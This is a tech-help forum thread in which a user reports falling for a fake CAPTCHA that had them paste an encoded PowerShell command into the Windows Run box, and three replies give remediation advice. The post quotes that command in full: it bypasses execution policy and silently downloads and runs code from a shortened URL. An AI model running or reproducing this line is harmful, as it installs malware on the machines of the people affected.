I was browsing the internet and clicked on some links from a Google search. One of those links opened what looked like a Cloudflare captcha, which then prompted me to press Windows + R and copy some text that was automatically added to my clipboard. Exhausted and a bit naive, I followed the instructions and ran a PowerShell script:
`powershell -ep bypass -enc KABJAG4AdgBvAGsAZQAtAHcAZQBiAHIAZQBxAHUAZQBzAHQAIAAtAFUAUgBJACAAJwBoAHQAdABwAHMAOgAvAC8AcwBoAG8AcgB0AGUAcgAuAG0AZQAvAFgATwBXAHkAVAAnACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwApAC4AYwBvAG4AdABlAG4AdAAgAHwAaQBlAHgA -w 1`
This installed a program called Crysta_X64.exe. I've since deleted that program and run Malwarebytes, but I still feel uneasy. What should I do next? Any advice?
3 Answers
If you think malware might be on your PC, consider reinstalling Windows using a USB stick. After that, change all your passwords and make sure to enable two-factor authentication (2FA) wherever possible. And seriously, think twice before running any scripts found online in the future!
You definitely made a mistake by running that script. If a site prompts you to open the Run dialog or any command line, stop immediately! Those sites are usually trying to install viruses or steal your info. It's good you realized it now, but be very cautious moving forward.
You basically told your system to download and execute a program with zero confirmation. That's a big no-no. The PowerShell command you ran bypassed security measures and ran a base64 encoded command silently. You should definitely reinstall Windows, change all your passwords, and never run unknown scripts again!
Related Questions
Can't Load PhpMyadmin On After Server Update
Redirect www to non-www in Apache Conf
How To Check If Your SSL Cert Is SHA 1
Windows TrackPad Gestures